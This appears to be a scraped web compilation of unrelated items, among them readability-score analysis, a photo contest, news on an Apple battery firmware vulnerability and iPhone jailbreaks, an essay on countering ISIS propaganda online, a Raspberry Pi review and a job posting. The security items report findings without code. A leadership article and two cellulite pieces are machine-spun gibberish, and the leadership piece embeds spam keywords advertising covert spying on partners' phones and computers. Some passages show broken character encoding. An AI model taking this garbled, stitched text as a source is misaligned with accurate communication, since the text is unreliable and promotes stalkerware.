Still, I felt a nagging sense, Flesch Reading Ease was treating the Before snippet unfairly. Perhaps, something other than Flesch Reading Ease would provide reasonable results. Enter the SMOG Calculator of G. Harry McLaughlin, founder of the SMOG:
With a SMOG reading of 18.49, the Before snippet verges on the same reading level as The IRS Tax Code. Unfortunately, like Flesh and Word, the lack of periods following bullets leads to a highly skewed reading for the After snippet - a higher SMOG level than the Before snippet! When we add in periods as shown in the After snippet above, the SMOG level falls between Newsweek and Sports Illustrated:
One Last Attempt to Second-guess both Flesch Reading Ease and SMOG
If SMOG equates the Before snippet with the IRS Tax Code, I can accept it, but it still seems unfair to give it a Flesch Reading Ease of zero. Enter Aella Lei's Writing Sample Analyzer .
Like Flesh and Word, Writing Sample Analyzer is vulnerable to bullet points without periods but the most interesting thing about Writing Sample Analyzer is its calculation of Flesch Reading Ease:
Instead of zero, Writing Sample Analyzer returns 11.05. Why? I don't know yet but once I hear back from Aella Lei, I'll let you know. While a jump from 0.0 to 11.05 is considerable and raises questions about this implementation of Flesch Reading Ease, 11.05 still makes for difficult reading.
Also note, the Fog Scale really is the exact same thing as SMOG. It looks reasonable for the Before snippet. The Before snippet's grade level also falls in-line with expectations. On the other hand, its results for the After snippet are out-of-whack across-the-board due to periods following only the last bullet point in each bullet point group.
When we add periods to each After snippet bullet, Writing Sample Analyzer responds with:
The Flesch Reading Ease looks about right but the Fog and Grade Level seem too high. Even so, comparing the Before and After snippets for Flesch Reading Ease, SMOG, and Grade Level all seem reasonable on a relative basis.
So, this B2B Marketing Piece Really is Hard to Read
All in all, both Flesch Reading Ease and SMOG support one another. In addition, while various tools for calculating Flesch Reading Ease give slightly different results, we can safely assert none of them are skewing the results to the point of denying this B2B Marketing piece a fair shake.
To be completely even-handed with a B2B marketing piece scoring zero on the Flesch Reading Ease index, we looked at several implementations of the index. This helped eliminate quirks with any given tool as a contributing factor.
To eliminate Flesch Reading Ease itself as an unreliable barometer, we introduced a measure of reading difficulty called SMOG. SMOG gave us the most intuitive sense of how hard this literature is to read because it equates the piece with other well-known publications in the same SMOG range. On this basis, the piece ranks with The Harvard Business Review at the low end and The IRS Tax Code at the high end.
All of the tools used were susceptible to a lack of periods following bullet points because:
Since the After snippet breaks out the 4 long bullets of the Before snippet into 14 shorter ones, the After snippet figures improved most dramatically when we added periods to every bullet. It's reasonable to do this because the mind processes bullets as if they were separate sentences or ideas.
Also, adding bullets to the end of each bullet makes for a fair comparison since the Before snippet ends each bullet with a period as well.
In Part Two, we will:
Finally, in Part Two, we'll deconstruct the Before and After snippets to address the challenges we set forth for this tune-up.
To your marketing success,
|July Photo Contest - Winners and Honorable Mention|
July's theme was a tough one. For many of us, being behind the camera is much more comfortable than being in front of it, and I congratulate you all on taking this risk. It was particularly beautiful to witness how you all see yourselves, to be able to understand you a little better by looking through your eyes. Thank you for offering your vulnerability to our community and giving us a peak into your core.
Top Vote Winner (509 Points):
Our "People's Choice Winner" who received the most votes in the photo contest was Adelyn Baber with her entry "She Waits". Adelyn says that this piece was "inspired by the time apart from my husband who was in Afghanistan."
Textures used: Suede
NOTE: Contestants are allowed to win the "People's Choice" portion of the vote contest only once.
Judge's Choice Winner:
Our judge's choice winner was Krista Vanden Bosch with this entry entitled "Hidden". Krista comments,
"July Self Portrait - honestly, hardest month yet not because of lack of ideas, but because *I* had to be the model. I made this a personal challenge to not use liquify at all, but use posing and shadows instead. It made it easier to not look at the camera as well. The main idea behind it was to kind of be hidden and blend in with the field, since that is what I like to do myself . I also didn't want it to look like I shot this in my back yard, but have it be a place that could be anywhere in the world."
Textures used: Extreme
Congratulations, ladies! Krista and Adelyn will receive:
$50 to Amazon.com
$150 to the JD Textures store
Top 10 Honorable Mentions :
(Please remember - to be considered for an honorable mention, you MUST add your photo to my FB wall (even if you already entered the contest).
Textures used: Harper, Encompass, and a light flare
"Time Worth Sparing" by Caitlyn Blake
Textures used: Arisen, Sublime, Stained Canvas, Light Beam 2
Textures used: Extreme, Murmurs, Sublime
"Untitled 2013" by Brianna Ramos
Textures used: Murmurs
"Pensive" by Carrie Kizuka
Textures used: Drifter
Textures used: Wind, Last Hope, Snow 4
Textures used: Bramble, Light Leak 14
"Untitled" by Lindsey Gutierrez
Textures used: Force of Nature
"Beneath" by Catherine Griffiths Auger
Textures used: Dark World, Atlantic, & Sketchbook
"Air Raid" by Marcie Dawn Pagliaro
Textures used: Star Spangled
A million thank you's to those who participated. This was by far one of my favorite contests I've hosted yet - so much depth and sincerity in these images. What a lovely bunch you are.
Stay tuned for next month's challenge - "Different World"!
|Jailbreak And Unlock iPhone 4/3Gs 4.3.5 Using The New FastSn0w, Apple's iOS ... - Sportz News|
Lion Feature Support
Jeff is the Mac Observer's Managing Editor, and co-host of the Apple Context Machine podcast. He is the author of "The Designer's Guide to Mac OS X" from Peachpit Press, and writes for several design-related publications. Jeff has presented at events such as Macworld Expo, the RSA Conference, and the Mac Computer Expo. In all his spare time, he also co-hosts the We Have Communicators podcast, and makes guest appearances on several other podcasts, too. Jeff dreams in HD.
iOS 4.3.5 Security Update
which is meant to patch a security vulnerability which could have left your phone open to an attack. If you're not using a jailbroken device you should probably connect your iPhone, iPod (ipod touch firmware 3.1.3 download) touch or iPad to iTunes and install iOS 4.3.5 to tighten security. For Verizon iPhone users, the software update will bring iOS 4.2.10.
iPad 2 Jailbreak
While Apple can claim the recent update was to "protect" users, in reality it will only add additional safety to the most careless of users. After all, a program called "PDF Patcher 2â³ was widely available via the Cydia app store and other sources. The PDF Patcher 2 does pretty much the exact same thing as iOS 4.3.4, but does so after the user has jailbroken.
iOS 4.3.4 Jailbreak released
The message from the iPhone Dev Team is that most users should stay on iOS 4.3.3 and not update at all; there's no new functionality to be had, only the security fix (which can be achieved with a third-party app called PDF Patcher 2, available from the Cydia unofficial app store). Meanwhile this new jailbreak won't work on the iPad 2, and is being billed as primarily for the benefit of kernel hackers who want to work on the very latest firmware version.
|Apple Laptop Batteries Can Be Hacked, Infected With Malware - SecurityNewsDaily|
Jul 25, 2011 | 12:15 PM ET | By Paul Wagenseil, SecurityNewsDaily Managing Editor
Apple laptop batteries can be hacked to infect the laptop with malware, or possibly even rigged to explode, a well-known security researcher has found.
All modern laptop batteries have logic chips inside them that communicate with the computer they’re powering. That’s how you’re able to see how much charge is remaining. The chips also carry out regulatory tasks, such as shutting down the charging process when a battery’s at risk of overcharging.
But any logic chip has operating software â “firmware” â and that software can usually be remotely updated.
Charlie Miller, who’s famous for winning the annual Pwn2Own contest four times with his Mac OS X and iOS exploits, discovered that Apple puts the same password on all its laptop batteries in order to efficiently send out battery firmware updates.
Unfortunately, a skilled malicious hacker armed with the password could alter the firmware, Miller says. Altered firmware could be used to store malware or tweaked to damage the computer.
“These batteries just aren’t designed with the idea that people will mess with them,” Miller told Forbes tech blogger Andy Greenberg. “What I’m showing is that it’s possible to use them to do something really bad.”
Miller will be presenting his finding at next week’s Black Hat security conference in Las Vegas. He has already notified Apple of the vulnerability, and is not revealing the password.
Digging into source code
Miller, who formerly was with the National Security Agency and currently works for Denver security firm Accuvant Labs, was intrigued by a 2009 firmware update that Apple had sent out to fix a problem with MacBook batteries.
He analyzed the code for the update, found an administrative password and then noticed it applied to all models of Apple battery. This isn’t unusual â the iPhone, iPad and iPod (ipod touch firmware 3.1.3 download) Touch also share a default, and easily Googled, administrative password.
Miller reverse-engineered the Apple battery firmware (“bricking,” or permanently damaging, seven of the $ 130 batteries in the process) and discovered how to alter it to send false readings to the laptop user, to damage the battery or even to serve as a hidden repository for malware.
“You could put a whole hard drive in, reinstall the software, flash the BIOS and every time it would re-attack and screw you over,” Miller told Greenberg. “There would be no way to eradicate or detect it other than removing the battery.”
The greater problem
Could the firmware be rigged to make the battery explode? Miller found that the Apple batteries had built-in fuses to prevent serious overheating, but there’s no guarantee counterfeit batteries would have such safeguards.
Miller has written a patch â he’s calling it “Caulkgun” â for the Apple battery vulnerability and will release it at Black Hat.
The downside is that Caulkgun will prevent future firmware updates. Nor will it do anything to solve the greater problem, because this vulnerability is not confined to Apple laptop batteries.
Most computer accessories and parts â hard drives, optical drives, graphics cards and network cards, for example â use firmware-upgradable logic chips. Most have enough memory space to house a small piece of malware.
It’s likely that most items in each category from a particular brand use the same administrative password.
For malicious hackers, it’s just a matter of finding out what those passwords are.
YOU MIGHT ALSO BE INTERESTED IN
|Do in the past||Everyone wants to expound themselves as a mastermind. Everyday, new books on leadership come in out on the market. Leaders are seen all over - business, society, and, of course, social relation. Yet, in our philosophy wherever greatness is frequently measured by resonance rather than accomplishment, I brainchild it would be ministrant to fix the factors that tell apart the true leading light from the not respectable "cheerleader."* Cheerleaders are thermometers, spell sincere body are thermostats. Where thermometers gauge the weather, thermostats conversion it. This is the clear illation in my sentiment. While thermometers hold fast their fingers in the coil to see what direction the curl (or gang) is going, the apodeictic captain determines his or her path and follows it. They do that which they suppose is top-quality for each one involved. Often genuine body have to adapt judgment in the past they can be familiar as a chief. They are fain to do this in establish to form a factual deviation.* Cheerleaders are oftentimes victims, time honest leadership are e'er owners. Cheerleaders will often damn anyone or entry other than themselves if thing goes fallacious underneath their control. With apodictic leaders, in the libretto of Harry Truman, "the low-level boodle here." True leaders poorness task for the decisions they make, apologise for their mistakes, and will gawk to part symbol near others when things go asymptomatic.Post ads:how to tell a woman is cheating / wifi software mobile phones download / obtaining cell phone records text messages / modem phone line recorder / okay to cheat on wife / people cheating battlefield 2 / how bad is cheating goodman / cheaters theme song / open real spy monitor / spy.log hibernate / how to record cell phone call android / spy-phones.co.uk / remote monitoring software video / how to record calls on landline / how to spy on a remote computer-freeware / cheating log book hours / listen cell phone microphone* Cheerleaders focussing on themselves, spell leadership concentration on the make happen. There is zilch more than vulnerable than feat between a friend and a microphone, TV camera, or photograph op. Such population are interested in themselves and greatly dinky other. True body are afraid roughly speaking the result in or the task. "Who" gets the gratitude is not well-nigh as far-reaching as the overhang getting done! This is one of the biggest differences linking cheerleaders and true leaders.|
|Marketing to Extremists: Waging War in Cyberspace|
Online, the Islamic State is a technologically savvy, sophisticated, and nimble organization that learns from its mistakes and from the actions of the Western intelligence services and NGOs that have sought to counter it. It is no secret that past and current efforts to reach potential terrorists before they can become radicalized and committed to a path of jihad and terrorism have proved inadequate. To use the language of online marketers, countering ISIS’s online activities will require quality content disseminated on a massive scale, with careful product placement. Placing counter-messaging products into platforms and forums that extremists frequent will increase the chances of potential terrorist recruits coming into contact with narratives outside of ISIS’ control.
ISIS’s cyber efforts have paid off; the FBI told Congress in July 2016 that “the message of radicalization spreads faster than we imagined just a few years ago.”[i] The number of foreigners who have been inspired by the Islamic State’s online propaganda to travel to Syria and Iraq (or elsewhere) and participate in the fighting is unclear, but most estimates place the tally at more than 20,000. Others have been set on the path of radicalization by ISIS’s online propaganda and have become “lone wolf” attackers in the United States or in Europe.[ii] Demographically speaking, the people who ISIS is most interested in targeting for recruitment came of age in the twenty-first century as “digital natives”; they have lived their entire lives surrounded by ubiquitous online communications and have embraced it in technologically sophisticated ways.[iii] ISIS knows how to appeal to these potential jihadis. Reaching them with counter-messages will require a sophisticated and multi-faceted approach.
America’s public and private sectors must commit the resources needed to carry out this counter-messaging, though we must understand that such an information war cannot be won in a short period of time, but rather, must be carried out resolutely and patiently, even in the absence of quantitative metrics of success. For example, how will we assess our effectiveness, when one measure of success is how many potential jihadis did not decide to carry out lone wolf attacks or travel to Syria? This is an entirely new and different kind of fight from any we have been engaged previously. Even without quantitative measures of effectiveness fully fleshed out, we can use scale, quality content, and product placement to improve current efforts to shape–and hopefully win–the online propaganda wars to come.
Understanding Our Options
In terms of quality counter-messaging content, the State Department–the lead U.S. agency in this fight—has already acknowledged its past failures in content production. Notably, it has acknowledged that it may not be the voice best-suited to convince Middle Eastern or Muslim recruits to turn away from the path of terrorism. The State Department’s Global Engagement Center has pivoted away from producing content, and instead now supports the efforts of localized “proxies,” thereby supporting other voices that understand the context, culture, and push/pull factors that resonate within Muslim communities.[iv] It is not only government entities involved in this struggle; various NGOs also participate in counter-jihad content creation, drawing upon former extremists, notable academics, and a multitude of languages.[v]
The West’s efforts to date have mostly created a series of reactive, ineffective counter-narratives that potential jihadis dismiss. We advocate for precision messaging; for example, past efforts by State Department entities have mined public social media data to identify individuals who may be susceptible to extremism and then pay for YouTube ads that counter extremist messaging. But we don’t need to mine public data to put counter messaging into the world of potential recruits. The United States must become aggressive and proactive in its anti-Islamic State online activities: it must immediately move to hijack the group’s own narratives and create alternatives.
When it comes to scale, the current efforts by the United States and its allies are merely a drop in the ocean of ISIS’s material. If ISIS posts nearly 100,000 messages each day, as the British House of Commons Defence Committee stated in 2015,[vi] then countering their content will take a significant amount of internet traffic or else we risk being drowned out. This component cannot be ignored or understated. Current counter-messaging efforts are not achieving enough volume to warrant a response by would-be extremists, let alone to spark an actual conversation or debate among extremists. If we have quality content and we know where to put it to reach potential recruits, we still cannot reach enough people without massively increasing the current volume of counter-messaging efforts.
When it comes to proper product placement for the counter-messaging, the best way to decide where and how to reach recruits is by watching ISIS itself. ISIS has had to transition from various platforms throughout its years of recruitment, including Tumblr, Facebook, Twitter, and Telegram. ISIS’s supporters take an active role in finding new platforms, spreading propaganda, and shepherding others along to new sites and procedures. It is not uncommon for followers to post specific instructions on where to post or how to manipulate different platforms’ terms of service to remain undetected or prevent accounts from being shut down. As they communicate best practices to each other, they create a trail for analysts to follow and instructions for counter-messaging units in order to put counter content where recruits will see it, even if this sometimes results in informational “misfires.”
The opportunities afforded by focusing our efforts on these approaches are manifold. If we are able to effectively erode the Islamic State’s ability to use propaganda to inspire self-directed attacks in the West, it would be forced to expend its resources and personnel on directed attacks in the West if it wishes to continue such operations. Sending Islamic State operatives into the West to carry out attacks there is a much more difficult and costly proposition, and one that is vulnerable to the West’s traditional strengths in intelligence and counterterrorism.
A Starting Point
We have compiled a list of some of ISIS’s known recruitment practices, along with specific recommendations for ways that counter-messaging organizations could take advantage of them. This list is not meant to be comprehensive or static, but rather to serve as a starting point that could be executed immediately and without excessive cost or effort.
Keeping Followers as Twitter/Telegram Accounts are Shut Down: As Twitter has improved its process of shutting down Islamic State accounts, its supporters have devised strategies to maintain their network of followers from one account to their next. The most popular method is to simply add a number to their Twitter username and then to increase that number each time they are shut down and begin a new account. Thus, for example, followers of @Muslimah6 could find her on her new account @Muslimah7 after Twitter shut down her account. This method of maintaining followers has been adapted for Telegram as well. The Islamic State’s unofficial news channel “Khilafah News” is left public, meaning that new users can always find it. But this also allows Telegram to shut it down at any time. The administrators of Khilafah News add a number to the end of their channel’s invitation link and increase this number every time the previous channel is shut down by Telegram. It is important to remember that Islamic State recruiters want to be found in order to effectively recruit new members. This nomenclature pattern allows them to do just that. But more importantly, it creates an opportunity for those creating alternative narratives to put their content on a Telegram channel or a Twitter account that they know Islamic State supporters will follow. New iterations of the Khilafah News channel could be created, knowing that once Telegram shuts down the last Khilafah News channel Islamic State supporters would follow the new fake channel, believing it to be authentic Islamic State channels and increasing the likelihood that a recruit would be exposed to counter-messaging.
The Islamic State’s Hashtags: Since it began disseminating propaganda on social media, the Islamic State has embraced the power of hashtags. In 2014 it famously hijacked World Cup hashtags in English and Arabic in order to spread its propaganda and shock social media users who may not have been previously exposed to such messages. The group has also advertised hashtags for supporters to use when tagging and finding new propaganda. Just as the Islamic State hijacks popular hashtags, counter-messaging teams can utilize the group’s own hashtags when posting content on social media. This will put alternative narratives in the same social media conversation as the Islamic State’s propaganda and will increase the chances that a recruit would receive facts about the group. The U.S. government has begun to take tentative steps in this direction, but such efforts could be vastly expanded.
Promotion and Marketing: The Islamic State disseminates small propaganda pieces daily, but its larger propaganda pieces take more time. In order to build hype, the Islamic State typically advertises with multi-lingual “trailers” for large upcoming pieces. Dissemination of the pieces generally occur days later, but there is no set schedule. Upon dissemination, the group posts its videos on YouTube, social media, and various self-publishing sites. Teams that produce content to counter the Islamic State must have videos ready for dissemination at all times. Then as new Islamic State’s trailers begin to appear on social media, the counter-content can be disseminated first under the same name as the propaganda that the Islamic State is advertising and it must be placed on all of the sites that the group uses. Recruits will be checking frequently for the release and the Islamic State will actually be advertising and promoting pieces that could pull recruits away. This would effectively drown out the Islamic State’s content while increasing the likelihood that recruits see alternative narratives.
Take Advantage of Platform Restrictions and Features:Not all of the Islamic State’s content is violent and grotesque; it produces some content that does not show any violent images or videos whatsoever. This allows the content to be played on news programs and for it be posted on YouTube. Knowing that the Islamic State works to keep its content available on major publishing sites, counter-narrative agencies must do the same. If a recruit searches for the name of a popular propaganda video on YouTube or an equivalent site, counter-content should appear with the same name. Video creators can even pay to promote their content so that it tops a search list. A greater understanding for how various platforms choose the order of their search results would help counter content receive just as many hits, if not more, than Islamic State propaganda.
Maintaining YouTube Channels: The Islamic State has a carefully structured propaganda structure. It has central marketing agencies that run video content, radio broadcasts, and written publications. These “federal” programs are represented within each wilayat, or province, as well. Each wilayat produces its own multilingual videos and publications that are often featured in publications from the central agencies. Islamic State supporters have advanced this model even further. There are several known propaganda groups that support the Islamic State but are not run by official Islamic State employees. Supporters make their own content and publish it on YouTube, Twitter, Telegram, and various other social and self-publishing sites. Like the Islamic State’s agencies, they have their own calligraphic logos and follow predictable but evolving patterns. “Al-Haqq” is one such Islamic State-affiliated group that runs its own Telegram channels and YouTube accounts. It would be simple to create a YouTube account called “Al-Haqq,” utilizing the group’s logo and publishing content that appears to be Islamic State videos. In reality, these videos could contain counter-messaging content with the same names as known extremist productions.
In adopting these methods, even potential jihadis who are adept at hiding their identities or degree of radicalization would come into contact with alternative narratives that may cause them to question the narratives ISIS feeds to its supporters. It is important for analysts who study ISIS’s dissemination of propaganda to remain in constant contact with those working to counter ISIS’s messaging, helping the latter to evolve along with ISIS and other extremist groups. While we are currently scrambling to combat ISIS’s propaganda campaigns in the cyber domain, learning to develop the necessary approaches now will allow us to excel in future cyber wars with other extremist groups. Without a new strategy for winning the information war, the West will always be reactive and on the defensive as it struggles to compete with the Islamic State for the hearts and minds of Muslims around the world. Most importantly, if we can create an adaptive and empowered cyber effort now, we will be better equipped for the terrorist groups that will learn from and advance the work that the Islamic State is doing now. Future jihadi organizations that come after the Islamic State can be expected to be even savvier users of social media and similar communications venues. Unless the West learns to use social media with the same level of sophistication, it will continue to lose the information war and fall further behind.
[i] Michael Steinbach, executive assistant director for the FBI’s National Security Branch, testimony before the Committee on Homeland Security and Governmental Affairs Permanent Subcommittee on Investigations, United States Senate, July 6, 2016, https://www.hsgac.senate.gov/subcommittees/investigations/hearings/isis-online-countering-terrorist-radicalization-and-recruitment-on-the-internet_social-media.
[ii] Daniel Byman, “How to Hunt a Lone Wolf: Countering Terrorists Who Act on Their Own,” Foreign Affairs, Vol. 96, No. 2 (March/April 2017): 96-105.
[iii] Marc Prensky,” Digital Natives, Digital Immigrants,” On the Horizon vol. 9, no. 5 (October 2001): 1-6.
[iv] Joby Warrick, “How a U.S. team uses Facebook, guerrilla marketing to peel off potential ISIS recruits,” Washington Post, February 6, 2017,https://www.washingtonpost.com/world/national-security/bait-and-flip-us-team-uses-facebook-guerrilla-marketing-to-peel-off-potential-isis-recruits/2017/02/03/431e19ba-e4e4-11e6-a547-5fb9411d332c_story.html.
[v] Representative NGOs include the Counter Extremism Project, Families Against Terrorism and Extremism, and the Institute for Strategic Dialogue. For examples of their work, see “Counter Extremism Project Unveils Technology to Combat Online Extremism,” Counter Extremism Project, June 17, 2016,https://www.counterextremism.com/press/counter-extremism-project-unveils-technology-combat-online-extremism; “Watch & Share,” FATE, http://www.findfate.org/en/watch-share/; Jonathan Russell, “Helping Families to Safeguard from Extremism,” FATE, http://www.findfate.org/en/helping-families-to-safeguard-from-extremism/; “One to One Online Interventions: A Pilot CVE Methodology,” Institute for Strategic Dialogue, April 2016, http://www.strategicdialogue.org/wp-content/uploads/2016/04/One2One_Web_v9.pdf.
[vi] UK Parliament, “The Situation in Iraq and Syria and the Response to al-Dawla al-Islamiya fi al-Iraq al-Sham (DAESH),” February 5, 2015,https://www.publications.parliament.uk/pa/cm201415/cmselect/cmdfence/690/69008.htm.
About the Authors
Andrew Byers is a visiting assistant professor of history at Duke University who has served as an intelligence and counterterrorism analyst and is a co-founder of the Counter Extremism Network.
Tara Mooney is a counter-violent-extremism analyst and co-founder of Talon Intelligence. She is also a co-founder of the Counter Extremism Network
|Qatarâs âindependentâ foreign policy will be costly|
Tuesday, August 1, 2017
The crisis in the Gulf Cooperation Council (GCC) has radically upset Doha’s foreign relations
Source: Oxford Analytica
The Gulf crisis, which began on June 5 when four Arab states launched a sudden and comprehensive boycott of Qatar, has thrown the country’s regional relations into disarray. In an effort to placate its enemies without losing face, Doha will seek to curb financing of Islamist groups, tinker with Al Jazeera’s editorial guidelines and expel opposition activists from other Gulf states. It will prioritise ties with Washington as the best possible route to resolution.
However, Qatar’s enemies are determined to see a public end to its long-standing ‘independent’ foreign policy. They will likely fail to bring its actions into line with the GCC leaders, but could exact a high economic price.
A protracted crisis could force Doha into uncomfortably close reliance on Tehran, deepening Gulf divisions.Qatar’s strategy of depending on US State Department advocacy might fall foul of US domestic political power shifts.Qatar’s enemies may call for regime change, but there are few available options short of unlikely military intervention.Foreign workers, many from South Asia, are the most vulnerable to the economic impact of the Gulf crisis
|Humpback dolphins: Researchers track vulnerable species in Moreton Bay off Brisbane||A team of researchers is snapping photos in Moreton Bay of one of Australia's little-known mammals, the humpback dolphin, in order to find out more about the animal amid a $1.3 billion harbour development proposal.|
|UAB welcomes new director of med school's Division of Infectious Diseases|
The University of Alabama at Birmingham (UAB) School of Medicine's Division of Infectious Diseases has named Jeanne Marrazzo, leading expert in the field of infectious diseases and HIV, its new director.
âI am thrilled to have Dr. Marrazzo join our department to lead the division at a time when it is thriving,â UAB Department of Medicine ChairÂ Seth Landefeld said. âDespite great advances in vaccines and antibiotics, infectious diseases remain major threats to our health â whether itâs the age-old scourge of tuberculosis, a super-virulent staph or a new epidemic like Zika virus. Tackling these diseases and growing our faculty of world leaders will advance health and health care for Alabamians and many, many others.â Â
Marrazzo is currently studying the effects of the Nuvaring, a contraceptive vaginal ring for women. In addition, she is studying how the ring interacts with those who have HIV and those who donât.
As part of her time at UAB, Marrazzo hopes to continue her research, while also looking at new infectious diseases. She plans to build a strong department that collaborates on ideas and projects alike.
âUAB has been a leader in HIV and STD research for decades, with a well-recognized reputation and body of work,â Marrazzo said. âFor example, the 1917 Clinic âÂ which provides primary care to people living with HIV and also conducts world-class research âÂ is iconic and a fixture of excellence in providing care to vulnerable populations, which is a critical part of working in the infectious diseases field.â
|Raspberry Pi First Impressions|
It's my Pi!
The long wait is over and I finally have my hands on an actual Raspberry Pi. Initial impressions was that I'm really nervous about getting this protected and supported in a case. It's no more vulnerable to abuse than any other PCB, but a case will give me some peace of mind.
Getting the SD card was easier than I thought it would be, and the instructions at http;//raspberrypi.org/downloads were clear and easy to follow. One caveat, however: they don't explain that the partitions need to be adjusted after you dd (the command for copying the image onto the SD card) the image onto the card. It gives you a filesystem partition of about 1.7 GB and if you have a 4GB card, a bunch of it is going unused if you don't fix it. I used gparted on an Ubuntu computer to move the swap partition to the end of the unallocated space and then grow the filesystem partition to fit. I'm pretty sure it would be a bad idea to change the start point of the filesystem partition, and I didn't.
It was a little dicey on first boot. I was a little dissapointed because it didn't sync up with my plasma TV via HDMI right away. I got some horizontal lines going across the screen. Information to help me troubleshoot this issue is hard to find, and the search function on the Raspberry Pi forums is, as one element14 user put it, "about as useful as a fish on a bicycle." I punted and switched over to the RCA output and that was no problem. Then I tried HDMI on the presentation projector, and that was fine too.
Getting the audio to work was a small saga, which I can not now relate because the file containing my notes are on the Raspberry Pi.
I have two more units on order with element14, which I'm happy to see both have delivery dates now. This first one was from England through RS Components. I'll have it a whole month before the first one from Newark element14 gets here. I registered interest with RS in the first hour of the announcement, and at element14 about 9 hours later. Not sure how that 9 hours really accounts for a month's worth of delay. I suspect things are just especially slow at element14.
This is a repost of my article on WixsonIT. Follow updates there.
|CAN 2012 : a pesar del pitido final, aÃºn queda por ganar el partido contra el hambre en el Sahel|
Se estima que el nÃºmero de personas que necesita asistencia en la regiÃ³n del Sahel aumenta hasta los 11 millones, por lo que Oxfam advierte de que debe reforzarse la labor humanitaria en las prÃ³ximas semanas.
Cada mes de retraso se traducirÃ¡ en un empeoramiento de la situaciÃ³n para las comunidades mÃ¡s vulnerables y conllevarÃ¡ el aumento del coste de la respuesta
Asesor de PolÃticas de Seguridad Alimentaria de Oxfam en Ãfrica del Oeste
Notas a los editores:
ImÃ¡genes : http://www.flickr.com/photos/letstacklehunger/
Contacto para medios:
Charles Bambara - SÃ©nÃ©gal (Dakar): firstname.lastname@example.org - +221 77 639 4178
Irina Fuhrman - Mauritanie email@example.com - +222 48021965
Ian Bray - Oxford - firstname.lastname@example.org +44 (0)7721 461339
Magali Rubino - Paris - email@example.com +33 630466604
Al Hassan CissÃ©
|Updated â MocoSpace reveals private e-mail addresses||Vulnerabilities exist in social networking sites such as MocoSpace that, when exploited, can disclose the private e-mail address of targeted users. These vulnerabilities are caused by the interaction of the site's internal e-mail system, with the external e-mail system that hosts a user's private e-mail account.|
|A (temporary) countermeasure for the Verizon Droid pattern lock bypass||It has been observed that, as long as a Bluetooth device is paired, AND CONNECTED, to the Droid; the pattern lock bypass vulnerability does not occur.|
|Exercises to get rid of Cellulite - Simple Exercises That You Can Do to obtain Back Your Beautiful Skin|
Daily ExerciseYou want to do daily exercises and along with detoxing plus some hormonal balancing might help alleviate the unsightly appearance of cellulites within your body. Performing these everyday won't help remove cellulite but offer you an over-all healthy body too.
Do Cardio workout routinesPerfect cellulite workouts are cardio workouts. This could include walking, jogging and swimming or anaerobic exercises centered on firming the upper thighs, sides and bottom because these are where one can usually place cellulite build-ups.
Carrying this out everyday you'll enhance your bloodstream circulation in addition to lymphatic drainage. Exercises for cellulite also aid in detoxing via sweating.
Anaerobic WorkoutAnother group of exercises is known as anaerobic workout also is essential in getting rid of cellulite because this can help you metabolize excess body fat that accumulates especially around the upper thighs and sides that eventually becomes the dreaded cellulites.
Hormonal RemediesRegrettably, sometimes exercises might not be enough to totally remove cellulite and hormonal unbalances. Some type of hormonal treatment might be utilized because it is also thought that certain other reason behind cellulite develop is hormonal discrepancy.
These cellulite workouts are really made to burn excess fats and alleviate cellulite formation in addition to convert body fat into muscles which will accelerate metabolic process too. It's also required for women who aren't overweight to concentrate their exercises on parts of the body that's really vulnerable to developing cellulites. Again consistency is essential if you want individuals cellulites to become completely eradicated.
|Symulast Joey Atlas - Cellulite Free Body Devoid of the Unpleasant Dimples|
The complete package in support of women in support of natural ejection of cellulite
It is of imperative meaning with the purpose of you educate manually on cellulite. Once you know all its ins and outs, you will be able to come all its reimbursement. With the package, you will receive-
The in a row in this Package has been constructed in a way with the purpose of can be with no trouble followed. There are 7 reports with the purpose of help overcome all your anxieties. The reports contend on matching of the catch areas of the body through convinced special exercises. You are extra guided to go along a dietary regimen with the purpose of is counterproductive to cellulite. Hence, you are able to deal with the cellulite with no having to garbage money on the pay for of creams and other misleading medications.
Though cellulite affects men as well as women, it is the females with the purpose of are exceedingly vulnerable. Cellulite is essentially formed in convinced areas like stomach, buttocks and thighs. But with the employment and effectuality of exercises, you can keep things under control.
If you are facing troubles due to impulsive loosening of the skin nearby the thighs and buttocks, you are pain from cellulite.You might click Symulast Joey Atlas now to see to it that why with the purpose of is the set of circumstances. Improper diet and hormonal instabilities are the prime reasons in support of this catch; however, you can control a better indication by learning more approaching dieting skills and performance.
|Chief Information Officer|
Exam type:Open Competitive (open to the public)
August 4, 2017
September 6, 2017
October 14, 2017
RESIDENCE REQUIREMENTS: THERE ARE NO RESIDENCY REQUIREMENTS FOR PARTICIPATION IN THIS EXAMINATION. There is one vacancy at the Erie County Medical Center Corporation.
Examples of Duties:
A Chief Information Officer plans, organizes, and directs the development, implementation and evaluation of computerized Hospital Management Information Systems (HMIS) supporting hospital operations; Ensures security of the electronic data for the enter institution, including electronic medical records of all patients and integrated electronic security (surveillance) for the facility; Oversees security for electronic data and equipment to prevent data breaches, malware and related viruses and vulnerability in systems and medical equipment connected to computerized systems; Develops, promulgates and oversees the execution of the information processing objective of the Medical Center and its departmental entities; Recruits and hires staff responsible for implementing, monitoring and maintaining Medical Center information systems; Advises Medical Center management, administrators and department heads on current trends and directions regarding management information systems and provides leadership in strategic planning, development, acquisition, implementation and operational initiative in all areas of information technologies; Oversees the development and implementation of standards, policies and procedures to assure the effective and efficient design, implementation and operation of information systems supporting the Medical Center and its component departments; Coordinates the development and implementation of standards, policies and procedures to assure the effective and efficient design, implementation and operation of information systems supporting the Medical Center and its component departments; Oversees the purchasing or contracting of all hardware, software and peripheral equipments and develops, negotiates and monitors all contracts for services; Projects information resource requirements of the Medical Center, develops budget and plans to meet assessed needs to include personnel, equipment, implementation and monitoring of this budget with the financial entities of the Medical Center; Meets with managers, administrators and clinical staff within the Medical Center and external to it, to communicate information systems objectives and to develop, implement and carryout policies and plans to achieve the established objectives; Coordinates the implementation of automated systems including but not limited to the acquisition of software, hardware and peripheral equipment and the assignment of technical staff to user departments which most effectively utilize available resources; Coordinates the activities of key managers and staff with the information systems department, reviews the performance of these individuals on a regular basis and establishes policies and procedures to assure that other departmental staff are similarly evaluated.
MINIMUM QUALIFICATIONS: Candidates must meet one of the following requirements on or before the date of the written test: Graduation from a regionally accredited or New York State registered college or university with a Bachelor’s Degree in Management Information Systems, Business or Public Administration, Computer Science or related management or technical field and eight (8) years of administrative* or supervisory** experience in the electronic data processing field, at least four (4) years of which involved the design and/or development of acute care hospital electronic data processing management information systems.
